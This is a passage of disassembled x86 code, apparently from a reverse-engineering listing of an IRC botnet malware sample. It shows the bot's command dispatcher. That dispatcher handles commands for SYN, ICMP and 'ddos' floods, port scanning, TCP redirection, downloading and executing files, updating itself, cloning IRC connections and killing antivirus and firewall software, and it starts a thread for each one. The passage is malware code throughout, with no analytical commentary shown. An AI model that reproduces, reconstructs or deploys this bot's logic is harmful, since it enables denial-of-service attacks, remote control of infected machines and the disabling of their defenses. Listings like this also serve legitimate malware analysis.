call sub_416905
add esp, 1Ch
jmp short loc_40B921
; ---------------------------------------------------------------------------
loc_40B907: ; CODE XREF: sub_409806+20D4�j
push offset aNetNoMessageSp ; "[NET]: No message specified."
jmp short loc_40B913
; ---------------------------------------------------------------------------
loc_40B90E: ; CODE XREF: sub_409806+20CF�j
push offset aNetCommandUnkn ; "[NET]: Command unknown."
loc_40B913: ; CODE XREF: sub_409806+1EA3�j
; sub_409806+2106�j ...
lea eax, [ebp+var_2F0]
loc_40B919: ; CODE XREF: sub_409806+1F30�j
; sub_409806+1F3A�j ...
push eax
call sub_416905
pop ecx
pop ecx
loc_40B921: ; CODE XREF: sub_409806+1EAB�j
; sub_409806+1F08�j ...
cmp [ebp+var_C], 0
jnz loc_40AEF2
push 0
jmp loc_40AED7
; ---------------------------------------------------------------------------
loc_40B932: ; CODE XREF: sub_409806+1E86�j
push 8
mov edi, eax
mov esi, offset aCapture ; "capture"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D2A3
push 4
mov edi, eax
mov esi, offset aCap ; "cap"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D2A3
push 8
mov edi, eax
mov esi, offset aGethost ; "gethost"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D1BE
push 3
mov edi, eax
mov esi, offset aGh ; "gh"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D1BE
push 0Bh
mov edi, eax
mov esi, offset aAvfwkiller ; "avfwkiller"
pop ecx
xor edx, edx
repe cmpsb
jnz loc_40BA8E
mov edi, [ebp+var_8]
push 6
mov esi, offset aStart ; "start"
pop ecx
xor eax, eax
repe cmpsb
jnz loc_40BA61
lea eax, [ebp+var_2F0]
push offset aAvfwAvFwBotKil ; "[AVFW]: AV/FW/BOT Killer active."
push eax
call sub_416905
push [ebp+ebx+var_9C]
xor edi, edi
push 1
push offset aKillerThread ; "Killer Thread"
push offset aAvfw ; "[AVFW]"
push 1
push edi
push [ebp+var_9C]
push [ebp+arg_4]
call sub_4138EC
push edi
lea eax, [ebp+var_2F0]
push 1
push eax
call sub_4136B6
add esp, 34h
mov esi, eax
lea eax, [ebp+var_18]
push eax
push edi
push edi
push offset sub_40911C
push edi
push edi
call dword_422008 ; CreateThread
imul esi, 234h
cmp eax, edi
mov dword_43B254[esi], eax
jnz short loc_40BA34
call dword_422004 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_2F0]
push offset aAvfwFailedToSt ; "[AVFW]: Failed to start AV/FW killer th"...
push eax
call sub_416905
add esp, 0Ch
loc_40BA34: ; CODE XREF: sub_409806+2211�j
lea eax, [ebp+var_2F0]
push eax
call sub_401ECD
push edi
push [ebp+var_4]
lea eax, [ebp+var_2F0]
push eax
push [ebp+var_9C]
push [ebp+arg_4]
call sub_405D20
add esp, 18h
jmp loc_409A84
; ---------------------------------------------------------------------------
loc_40BA61: ; CODE XREF: sub_409806+219F�j
mov edi, [ebp+var_8]
push 5
mov esi, offset aStop ; "stop"
pop ecx
xor eax, eax
repe cmpsb
jnz loc_409A84
push [ebp+ebx+var_9C]
push 1
push offset aKillerThread ; "Killer Thread"
push offset aAvfw ; "[AVFW]"
jmp loc_40EACD
; ---------------------------------------------------------------------------
loc_40BA8E: ; CODE XREF: sub_409806+218A�j
mov ecx, [ebp+ebx+var_9C]
test ecx, ecx
mov [ebp+var_10], ecx
jz loc_409A84
push 9
mov edi, eax
mov esi, offset aAddalias ; "addalias"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D14B
push 3
mov edi, eax
mov esi, offset aAa ; "aa"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D14B
push 8
mov edi, eax
mov esi, offset aPrivmsg_0 ; "privmsg"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D0E0
push 3
mov edi, eax
mov esi, offset aPm_0 ; "pm"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D0E0
push 7
mov edi, eax
mov esi, offset aAction ; "action"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D05D
push 2
mov edi, eax
mov esi, offset aA_1 ; "a"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D05D
push 6
mov edi, eax
mov esi, offset aCycle ; "cycle"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40CFF7
push 3
mov edi, eax
mov esi, offset aCy ; "cy"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40CFF7
push 5
mov edi, eax
mov esi, offset aMode ; "mode"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40CFBD
push 2
mov edi, eax
mov esi, offset aM ; "m"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40CFBD
push 6
mov edi, eax
mov esi, offset aC_raw ; "c_raw"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40CF4E
push 4
mov edi, eax
mov esi, offset aC_r ; "c_r"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40CF4E
push 7
mov edi, eax
mov esi, offset aC_mode ; "c_mode"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40CEC8
push 4
mov edi, eax
mov esi, offset aC_m ; "c_m"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40CEC8
push 7
mov edi, eax
mov esi, offset aC_nick ; "c_nick"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40CE57
push 4
mov edi, eax
mov esi, offset aC_n ; "c_n"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40CE57
push 7
mov edi, eax
mov esi, offset aC_join ; "c_join"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40CE2F
push 4
mov edi, eax
mov esi, offset aC_j ; "c_j"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40CE2F
push 7
mov edi, eax
mov esi, offset aC_part ; "c_part"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40CDC9
push 4
mov edi, eax
mov esi, offset aC_p ; "c_p"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40CDC9
push 7
mov edi, eax
mov esi, offset aRepeat ; "repeat"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40CD05
push 3
mov edi, eax
mov esi, offset aRp ; "rp"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40CD05
push 6
mov edi, eax
mov esi, offset aDelay ; "delay"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40CC68
push 3
mov edi, eax
mov esi, offset aDe ; "de"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40CC68
push 7
mov edi, eax
mov esi, offset aUpdate ; "update"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40CAA4
push 3
mov edi, eax
mov esi, offset aUp ; "up"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40CAA4
push 8
mov edi, eax
mov esi, offset aExecute ; "execute"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40CA01
push 2
mov edi, eax
mov esi, offset aE ; "e"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40CA01
push 9
mov edi, eax
mov esi, offset aFindfile ; "findfile"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C8F1
push 3
mov edi, eax
mov esi, offset aFf ; "ff"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C8F1
push 7
mov edi, eax
mov esi, offset aRename ; "rename"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C899
push 3
mov edi, eax
mov esi, offset aMv ; "mv"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C899
push 0Ah
mov edi, eax
mov esi, offset aIcmpflood ; "icmpflood"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C767
push 5
mov edi, eax
mov esi, offset aIcmp ; "icmp"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C767
mov ecx, [ebp+ebx+var_98]
test ecx, ecx
mov [ebp+arg_0], ecx
jz loc_409A84
push 6
mov edi, eax
mov esi, offset aClone_0 ; "clone"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C679
push 2
mov edi, eax
mov esi, offset aC ; "c"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C679
push 9
mov edi, eax
mov esi, offset aDdos_syn ; "ddos.syn"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C556
push 9
mov edi, eax
mov esi, offset aDdos_ack ; "ddos.ack"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C556
push 0Ch
mov edi, eax
mov esi, offset aDdos_random ; "ddos.random"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C556
push 9
mov edi, eax
mov esi, offset aSynflood ; "synflood"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C469
push 4
mov edi, eax
mov esi, offset aSyn ; "syn"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C469
push 9
mov edi, eax
mov esi, offset aDownload ; "download"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C2C7
push 3
mov edi, eax
mov esi, offset aDl ; "dl"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C2C7
push 9
mov edi, eax
mov esi, offset aRedirect ; "redirect"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C1CA
push 3
mov edi, eax
mov esi, offset aRd ; "rd"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C1CA
push 5
mov edi, eax
mov esi, offset aScan ; "scan"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C0D4
push 3
mov edi, eax
mov esi, offset aSc ; "sc"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C0D4
push 0Ah
mov edi, eax
mov esi, offset aC_privmsg ; "c_privmsg"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BFDE
push 5
mov edi, eax
mov esi, offset aC_pm ; "c_pm"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BFDE
push 9
mov edi, eax
mov esi, offset aC_action ; "c_action"
pop ecx
xor edx, edx
repe cmpsb
jz short loc_40BEAA
push 4
mov edi, eax
mov esi, offset dword_429D60
pop ecx
xor edx, edx
repe cmpsb
jnz loc_40AC59
loc_40BEAA: ; CODE XREF: sub_409806+268E�j
push [ebp+var_8]
call sub_416C92
imul eax, 234h
cmp byte_43B258[eax], 0
pop ecx
jz loc_40F8C3
mov edi, [ebp+var_14]
test edi, edi
jz loc_40F8C3
mov eax, [ebp+var_1C]
lea edx, [eax+1]
loc_40BED7: ; CODE XREF: sub_409806+26D6�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40BED7
sub eax, edx
mov ebx, eax
mov eax, [ebp+var_8]
lea ecx, [eax+1]
loc_40BEE8: ; CODE XREF: sub_409806+26E7�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40BEE8
sub eax, ecx
mov ecx, eax
mov eax, [ebp+var_10]
lea esi, [eax+1]
loc_40BEF9: ; CODE XREF: sub_409806+26F8�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40BEF9
push [ebp+arg_0]
sub eax, esi
add eax, ecx
add eax, ebx
lea eax, [eax+edi+2]
push eax
call sub_4173D0
mov esi, eax
push esi
lea eax, [ebp+var_2F0]
push offset dword_429D54
push eax
call sub_416905
add esp, 14h
test esi, esi
jz loc_40F8C3
mov edi, [ebp+var_8]
push edi
call sub_416C92
test eax, eax
pop ecx
jle loc_40F8C3
push edi
call sub_416C92
cmp eax, 1F4h
pop ecx
jge loc_40F8C3
xor ebx, ebx
push ebx
push ebx
lea eax, [ebp+var_2F0]
push eax
push [ebp+var_10]
push edi
call sub_416C92
imul eax, 234h
pop ecx
push dword_43B24C[eax]
call sub_405D20
push edi
call sub_416C92
imul eax, 234h
add esp, 18h
cmp byte ptr dword_43B040[eax], 73h
jnz loc_40F8C3
push esi
push edi
call sub_416C92
imul eax, 234h
pop ecx
add eax, offset byte_43B258
push eax
push [ebp+var_10]
push offset aSSS_2 ; "[%s] * %s %s"
loc_40BFB4: ; CODE XREF: sub_409806+28C9�j
lea eax, [ebp+var_2F0]
push eax
call sub_416905
push ebx
push [ebp+var_4]
lea eax, [ebp+var_2F0]
push eax
push [ebp+var_9C]
push [ebp+arg_4]
call sub_405D20
jmp loc_40E564
; ---------------------------------------------------------------------------
loc_40BFDE: ; CODE XREF: sub_409806+2666�j
; sub_409806+267A�j
push [ebp+var_8]
call sub_416C92
imul eax, 234h
cmp byte_43B258[eax], 0
pop ecx
jz loc_40F8C3
mov edi, [ebp+var_14]
test edi, edi
jz loc_40F8C3
mov eax, [ebp+var_1C]
lea edx, [eax+1]
loc_40C00B: ; CODE XREF: sub_409806+280A�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40C00B
sub eax, edx
mov ebx, eax
mov eax, [ebp+var_8]
lea ecx, [eax+1]
loc_40C01C: ; CODE XREF: sub_409806+281B�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40C01C
sub eax, ecx
mov ecx, eax
mov eax, [ebp+var_10]
lea esi, [eax+1]
loc_40C02D: ; CODE XREF: sub_409806+282C�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40C02D
push [ebp+arg_0]
sub eax, esi
add eax, ecx
add eax, ebx
lea eax, [eax+edi+2]
push eax
call sub_4173D0
mov esi, eax
test esi, esi
pop ecx
pop ecx
jz loc_40F8C3
mov edi, [ebp+var_8]
push edi
call sub_416C92
test eax, eax
pop ecx
jle loc_40F8C3
push edi
call sub_416C92
cmp eax, 1F4h
pop ecx
jge loc_40F8C3
xor ebx, ebx
push ebx
push ebx
push esi
push [ebp+var_10]
push edi
call sub_416C92
imul eax, 234h
pop ecx
push dword_43B24C[eax]
call sub_405D20
push edi
call sub_416C92
imul eax, 234h
add esp, 18h
cmp byte ptr dword_43B040[eax], 73h
jnz loc_40F8C3
push esi
push edi
call sub_416C92
imul eax, 234h
pop ecx
add eax, offset byte_43B258
push eax
push [ebp+var_10]
push offset aSSS_1 ; "[%s] <%s> %s"
jmp loc_40BFB4
; ---------------------------------------------------------------------------
loc_40C0D4: ; CODE XREF: sub_409806+263E�j
; sub_409806+2652�j
push [ebp+var_8]
call dword_43A414 ; inet_addr
push [ebp+var_10]
mov [ebp+var_408], eax
call sub_416C92
push [ebp+arg_0]
mov [ebp+var_414], eax
call sub_416C92
mov edi, [ebp+arg_4]
push 7Fh
push [ebp+var_9C]
mov [ebp+var_410], eax
lea eax, [ebp+var_494]
push eax
mov [ebp+var_498], edi
call sub_4169C0
mov eax, [ebp+var_C]
mov ebx, [ebp+var_4]
add esp, 14h
push [ebp+var_410]
mov [ebp+var_400], ebx
push [ebp+var_414]
mov [ebp+var_3FC], eax
push [ebp+var_408]
call dword_43A420 ; inet_ntoa
push eax
lea eax, [ebp+var_2F0]
push offset aScanPortScanSt ; "[SCAN]: Port scan started: %s:%d with d"...
push eax
call sub_416905
xor esi, esi
push esi
lea eax, [ebp+var_2F0]
push 9
push eax
call sub_4136B6
add esp, 20h
mov [ebp+var_40C], eax
lea eax, [ebp+var_18]
push eax
push esi
lea eax, [ebp+var_498]
push eax
push offset sub_4111E7
push esi
push esi
call dword_422008 ; CreateThread
mov ecx, [ebp+var_40C]
imul ecx, 234h
cmp eax, esi
mov dword_43B254[ecx], eax
jnz short loc_40C1BD
call dword_422004 ; RtlGetLastWin32Error
push eax
push offset aScanFailedTo_0 ; "[SCAN]: Failed to start scan thread, er"...
jmp loc_40C63A
; ---------------------------------------------------------------------------
loc_40C1B5: ; CODE XREF: sub_409806+29BD�j
push 32h
call dword_422000 ; Sleep
loc_40C1BD: ; CODE XREF: sub_409806+299C�j
cmp [ebp+var_3F8], esi
jz short loc_40C1B5
jmp loc_40C649
; ---------------------------------------------------------------------------
loc_40C1CA: ; CODE XREF: sub_409806+2616�j
; sub_409806+262A�j
push [ebp+var_8]
call sub_416C92
push 7Fh
push [ebp+var_10]
mov [ebp+var_EF8], eax
lea eax, [ebp+var_FFC]
push eax
call sub_4169C0
push [ebp+arg_0]
call sub_416C92
push [ebp+var_9C]
mov esi, [ebp+arg_4]
mov [ebp+var_EFC], eax
lea eax, [ebp+var_F7C]
push 80h
push eax
mov [ebp+var_1004], esi
call sub_416B5D
mov eax, [ebp+var_C]
mov ebx, [ebp+var_4]
add esp, 20h
push [ebp+var_EFC]
mov [ebp+var_EE8], eax
lea eax, [ebp+var_FFC]
push eax
push [ebp+var_EF8]
mov [ebp+var_EEC], ebx
push esi
call sub_408852
pop ecx
push eax
lea eax, [ebp+var_2F0]
push offset aRedirectTcpRed ; "[REDIRECT]: TCP redirect created from: "...
push eax
call sub_416905
xor edi, edi
push edi
lea eax, [ebp+var_2F0]
push 11h
push eax
call sub_4136B6
add esp, 24h
mov [ebp+var_EF4], eax
lea eax, [ebp+var_18]
push eax
push edi
lea eax, [ebp+var_1004]
push eax
push offset sub_4102A3
push edi
push edi
call dword_422008 ; CreateThread
mov ecx, [ebp+var_EF4]
imul ecx, 234h
cmp eax, edi
mov dword_43B254[ecx], eax
jnz short loc_40C2BA
call dword_422004 ; RtlGetLastWin32Error
push eax
push offset aRedirectFailed ; "[REDIRECT]: Failed to start redirection"...
jmp loc_40C42A
; ---------------------------------------------------------------------------
loc_40C2B2: ; CODE XREF: sub_409806+2ABA�j
push 32h
call dword_422000 ; Sleep
loc_40C2BA: ; CODE XREF: sub_409806+2A99�j
cmp [ebp+var_EE4], edi
jz short loc_40C2B2
jmp loc_40C439
; ---------------------------------------------------------------------------
loc_40C2C7: ; CODE XREF: sub_409806+25EE�j
; sub_409806+2602�j
mov esi, 0FFh
push esi
push [ebp+var_8]
lea eax, [ebp+var_E00]
push eax
call sub_4169C0
push [ebp+arg_0]
xor edi, edi
mov [ebp+var_AFC], edi
call sub_416C92
mov [ebp+var_AF8], eax
mov eax, [ebp+ebx+var_94]
add esp, 10h
cmp eax, edi
jz short loc_40C314
push 10h
push edi
push eax
call sub_417729
add esp, 0Ch
mov [ebp+var_AF0], eax
jmp short loc_40C31A
; ---------------------------------------------------------------------------
loc_40C314: ; CODE XREF: sub_409806+2AF8�j
mov [ebp+var_AF0], edi
loc_40C31A: ; CODE XREF: sub_409806+2B0C�j
mov ebx, [ebp+ebx+var_90]
cmp ebx, edi
jz short loc_40C334
push ebx
call sub_416C92
pop ecx
mov [ebp+var_AF4], eax
jmp short loc_40C33A
; ---------------------------------------------------------------------------
loc_40C334: ; CODE XREF: sub_409806+2B1D�j
mov [ebp+var_AF4], edi
loc_40C33A: ; CODE XREF: sub_409806+2B2C�j
push 3Fh
push [ebp+var_10]
call sub_417E10
mov ebx, eax
cmp ebx, edi
pop ecx
pop ecx
jz short loc_40C374
and byte ptr [ebx], 0
inc ebx
loc_40C350: ; CODE XREF: sub_409806+2B5B�j
push 26h
push ebx
call sub_417E10
cmp eax, edi
pop ecx
pop ecx
jz short loc_40C363
mov byte ptr [eax], 20h
jmp short loc_40C350
; ---------------------------------------------------------------------------
loc_40C363: ; CODE XREF: sub_409806+2B56�j
push esi
lea eax, [ebp+var_C00]
push ebx
push eax
call sub_4169C0
add esp, 0Ch
loc_40C374: ; CODE XREF: sub_409806+2B44�j
push esi
push [ebp+var_10]
lea eax, [ebp+var_D00]
push eax
call sub_4169C0
movzx eax, [ebp+var_38B]
mov esi, [ebp+arg_4]
push 7Fh
push [ebp+var_9C]
mov [ebp+var_AEC], eax
lea eax, [ebp+var_E80]
push eax
mov [ebp+var_E84], esi
call sub_4169C0
push [ebp+var_10]
mov eax, [ebp+var_C]
push [ebp+var_8]
mov ebx, [ebp+var_4]
mov [ebp+var_AE8], eax
lea eax, [ebp+var_2F0]
push offset aDownloadDown_1 ; "[DOWNLOAD]: Downloading URL: %s to: %s."...
push eax
mov [ebp+var_AE4], ebx
call sub_416905
push esi
lea eax, [ebp+var_2F0]
push 16h
push eax
call sub_4136B6
add esp, 34h
mov [ebp+var_B00], eax
lea eax, [ebp+var_18]
push eax
push edi
lea eax, [ebp+var_E84]
push eax
push offset sub_402C2F
push edi
push edi
call dword_422008 ; CreateThread
mov ecx, [ebp+var_B00]
imul ecx, 234h
cmp eax, edi
mov dword_43B254[ecx], eax
jnz short loc_40C45F
call dword_422004 ; RtlGetLastWin32Error
push eax
push offset aDownloadFailed ; "[DOWNLOAD]: Failed to start transfer th"...
loc_40C42A: ; CODE XREF: sub_409806+2AA7�j
; sub_409806+4A3E�j ...
lea eax, [ebp+var_2F0]
push eax
call sub_416905
add esp, 0Ch
loc_40C439: ; CODE XREF: sub_409806+2ABC�j
; sub_409806+2C61�j ...
cmp [ebp+var_C], edi
jnz loc_40EE11
push edi
push ebx
lea eax, [ebp+var_2F0]
push eax
push [ebp+var_9C]
push esi
jmp loc_40EE09
; ---------------------------------------------------------------------------
loc_40C457: ; CODE XREF: sub_409806+2C5F�j
push 32h
call dword_422000 ; Sleep
loc_40C45F: ; CODE XREF: sub_409806+2C16�j
cmp [ebp+var_AE0], edi
jz short loc_40C457
jmp short loc_40C439
; ---------------------------------------------------------------------------
loc_40C469: ; CODE XREF: sub_409806+25C6�j
; sub_409806+25DA�j
push 7Fh
pop esi
push esi
push [ebp+var_8]
lea eax, [ebp+var_1A54]
push eax
call sub_4169C0
push esi
push [ebp+var_10]
lea eax, [ebp+var_19D4]
push eax
call sub_4169C0
push esi
push [ebp+arg_0]
lea eax, [ebp+var_1954]
push eax
call sub_4169C0
push esi
push [ebp+var_9C]
lea eax, [ebp+var_18D4]
push eax
call sub_4169C0
push [ebp+arg_0]
mov eax, [ebp+var_C]
push [ebp+var_10]
mov ebx, [ebp+var_4]
push [ebp+var_8]
mov edi, [ebp+arg_4]
mov [ebp+var_184C], eax
lea eax, [ebp+var_2F0]
push offset aSynFloodingSSF ; "[SYN]: Flooding: (%s:%s) for %s seconds"...
push eax
mov [ebp+var_1850], ebx
mov [ebp+var_1A58], edi
call sub_416905
add esp, 44h
xor esi, esi
push esi
lea eax, [ebp+var_2F0]
push 0Ch
push eax
call sub_4136B6
add esp, 0Ch
mov [ebp+var_1854], eax
lea eax, [ebp+var_18]
push eax
push esi
lea eax, [ebp+var_1A58]
push eax
push offset sub_4128D2
push esi
push esi
call dword_422008 ; CreateThread
mov ecx, [ebp+var_1854]
imul ecx, 234h
cmp eax, esi
mov dword_43B254[ecx], eax
jnz short loc_40C549
call dword_422004 ; RtlGetLastWin32Error
push eax
push offset aSynFailedToSta ; "[SYN]: Failed to start flood thread, er"...
jmp loc_40C63A
; ---------------------------------------------------------------------------
loc_40C541: ; CODE XREF: sub_409806+2D49�j
push 32h
call dword_422000 ; Sleep
loc_40C549: ; CODE XREF: sub_409806+2D28�j
cmp [ebp+var_1848], esi
jz short loc_40C541
jmp loc_40C649
; ---------------------------------------------------------------------------
loc_40C556: ; CODE XREF: sub_409806+258A�j
; sub_409806+259E�j ...
push 7Fh
pop esi
push esi
push [ebp+var_8]
lea eax, [ebp+var_1CE4]
push eax
call sub_4169C0
push esi
push [ebp+var_10]
lea eax, [ebp+var_1C64]
push eax
call sub_4169C0
push esi
push [ebp+arg_0]
lea eax, [ebp+var_1BE4]
push eax
call sub_4169C0
push esi
push [ebp+var_9C]
lea eax, [ebp+var_1B64]
push eax
call sub_4169C0
push 20h
push [ebp+var_1C]
lea eax, [ebp+var_1AE4]
push eax
call sub_4169C0
push [ebp+arg_0]
mov eax, [ebp+var_C]
push [ebp+var_10]
mov ebx, [ebp+var_4]
push [ebp+var_8]
mov edi, [ebp+arg_4]
mov [ebp+var_1A60], eax
lea eax, [ebp+var_2F0]
push offset aDdosFloodingSS ; "[DDoS]: Flooding: (%s:%s) for %s second"...
push eax
mov [ebp+var_1A64], ebx
mov [ebp+var_1CEC], edi
call sub_416905
add esp, 50h
xor esi, esi
push esi
lea eax, [ebp+var_2F0]
push 0Bh
push eax
call sub_4136B6
add esp, 0Ch
mov [ebp+var_1CE8], eax
lea eax, [ebp+var_18]
push eax
push esi
lea eax, [ebp+var_1CEC]
push eax
push offset sub_402B61
push esi
push esi
call dword_422008 ; CreateThread
mov ecx, [ebp+var_1CE8]
imul ecx, 234h
cmp eax, esi
mov dword_43B254[ecx], eax
jnz short loc_40C66F
call dword_422004 ; RtlGetLastWin32Error
push eax
push offset aDdosFailedToSt ; "[DDoS]: Failed to start flood thread, e"...
loc_40C63A: ; CODE XREF: sub_409806+29AA�j
; sub_409806+2D36�j
lea eax, [ebp+var_2F0]
push eax
call sub_416905
add esp, 0Ch
loc_40C649: ; CODE XREF: sub_409806+29BF�j
; sub_409806+2D4B�j ...
cmp [ebp+var_C], esi
jnz loc_40EE11
push esi
push ebx
lea eax, [ebp+var_2F0]
push eax
push [ebp+var_9C]
push edi
jmp loc_40EE09
; ---------------------------------------------------------------------------
loc_40C667: ; CODE XREF: sub_409806+2E6F�j
push 32h
call dword_422000 ; Sleep
loc_40C66F: ; CODE XREF: sub_409806+2E26�j
cmp [ebp+var_1A5C], esi
jz short loc_40C667
jmp short loc_40C649
; ---------------------------------------------------------------------------
loc_40C679: ; CODE XREF: sub_409806+2562�j
; sub_409806+2576�j
push 7Fh
push [ebp+var_8]
lea eax, [ebp+var_16AC]
push eax
call sub_4169C0
push [ebp+var_10]
call sub_416C92
push 3Fh
push [ebp+arg_0]
mov [ebp+var_155C], eax
lea eax, [ebp+var_162C]
push eax
call sub_4169C0
mov ebx, [ebp+ebx+var_94]
xor esi, esi
add esp, 1Ch
cmp ebx, esi
jz short loc_40C6CB
push 3Fh
lea eax, [ebp+var_15EC]
push ebx
push eax
call sub_4169C0
add esp, 0Ch
loc_40C6CB: ; CODE XREF: sub_409806+2EB1�j
lea eax, [ebp+var_162C]
push eax
push [ebp+var_155C]
lea eax, [ebp+var_16AC]
push eax
lea eax, [ebp+var_2F0]
push offset aClonesCreatedO ; "[CLONES]: Created on %s:%d, in channel "...
push eax
mov [ebp+var_1558], 1
call sub_416905
push esi
lea eax, [ebp+var_2F0]
push 18h
push eax
call sub_4136B6
add esp, 20h
mov [ebp+var_1554], eax
lea eax, [ebp+var_18]
push eax
push esi
lea eax, [ebp+var_16B0]
push eax
push offset sub_4096A7
push esi
push esi
call dword_422008 ; CreateThread
mov ecx, [ebp+var_1554]
imul ecx, 234h
cmp eax, esi
mov dword_43B254[ecx], eax
jnz short loc_40C75A
call dword_422004 ; RtlGetLastWin32Error
push eax
push offset aClonesFailedTo ; "[CLONES]: Failed to start clone thread,"...
jmp loc_40D825
; ---------------------------------------------------------------------------
loc_40C752: ; CODE XREF: sub_409806+2F5A�j
push 32h
call dword_422000 ; Sleep
loc_40C75A: ; CODE XREF: sub_409806+2F39�j
cmp [ebp+var_1550], esi
jz short loc_40C752
jmp loc_40D834
; ---------------------------------------------------------------------------
loc_40C767: ; CODE XREF: sub_409806+2528�j
; sub_409806+253C�j
push [ebp+var_10]
call sub_416C92
mov ebx, [ebp+arg_4]
xor edi, edi
cmp eax, edi
pop ecx
mov [ebp+var_8F0], eax
jle loc_40C866
push [ebp+var_8]
mov esi, 80h
lea eax, [ebp+var_A78]
push esi
push eax
call sub_416B5D
push [ebp+var_9C]
xor eax, eax
cmp byte ptr [ebp+var_380+2], al
push esi
setnz al
mov [ebp+var_A7C], ebx
mov [ebp+var_8EC], eax
lea eax, [ebp+var_978]
push eax
call sub_416B5D
push [ebp+var_10]
mov eax, [ebp+var_4]
push [ebp+var_8]
mov [ebp+var_8E8], eax
mov eax, [ebp+var_C]
push offset aIcmpFloodingSF ; "[ICMP]: Flooding: (%s) for %s seconds."
mov [ebp+var_8E4], eax
lea eax, [ebp+var_2F0]
push 200h
push eax
call sub_416B5D
push edi
lea eax, [ebp+var_2F0]
push 0Eh
push eax
call sub_4136B6
add esp, 38h
mov [ebp+var_8F8], eax
lea eax, [ebp+var_18]
push eax
push edi
lea eax, [ebp+var_A7C]
push eax
push offset sub_40598C
push edi
push edi
call dword_422008 ; CreateThread
mov ecx, [ebp+var_8F8]
imul ecx, 234h
cmp eax, edi
mov dword_43B254[ecx], eax
jnz short loc_40C85C
call dword_422004 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_2F0]
push offset aIcmpFailedToSt ; "[ICMP]: Failed to start flood thread, e"...
push eax
call sub_416905
add esp, 0Ch
jmp short loc_40C879
; ---------------------------------------------------------------------------
loc_40C854: ; CODE XREF: sub_409806+305C�j
push 32h
call dword_422000 ; Sleep
loc_40C85C: ; CODE XREF: sub_409806+302F�j
cmp [ebp+var_8E0], edi
jz short loc_40C854
jmp short loc_40C879
; ---------------------------------------------------------------------------
loc_40C866: ; CODE XREF: sub_409806+2F77�j
lea eax, [ebp+var_2F0]
push offset aIcmpInvalidFlo ; "[ICMP]: Invalid flood time must be grea"...
push eax
call sub_416905
pop ecx
pop ecx
loc_40C879: ; CODE XREF: sub_409806+304C�j
; sub_409806+305E�j
cmp [ebp+var_C], edi
jnz loc_40EE11
push edi
push [ebp+var_4]
loc_40C886: ; CODE XREF: sub_409806+5C5B�j
lea eax, [ebp+var_2F0]
push eax
push [ebp+var_9C]
push ebx
jmp loc_40EE09
; ---------------------------------------------------------------------------
loc_40C899: ; CODE XREF: sub_409806+2500�j
; sub_409806+2514�j
push [ebp+var_10]
push [ebp+var_8]
call dword_4220F4 ; MoveFileA
test eax, eax
jz short loc_40C8CD
push [ebp+var_10]
lea eax, [ebp+var_2F0]
push [ebp+var_8]
push offset aFileRenameSToS ; "[FILE]: Rename: '%s' to: '%s'."
push 200h
push eax
call sub_416B5D
add esp, 14h
jmp loc_40EDEE
; ---------------------------------------------------------------------------
loc_40C8CD: ; CODE XREF: sub_409806+30A1�j
push offset aFile_0 ; "[FILE]:"
call sub_407327
push eax
lea eax, [ebp+var_2F0]
push 200h
push eax
call sub_416B5D
add esp, 10h
jmp loc_40EDEE
; ---------------------------------------------------------------------------
loc_40C8F1: ; CODE XREF: sub_409806+24D8�j
; sub_409806+24EC�j
push [ebp+var_8]
lea eax, [ebp+var_13BC]
push 104h
push eax
call sub_416B5D
xor esi, esi
add esp, 0Ch
cmp [ebp+var_14], esi
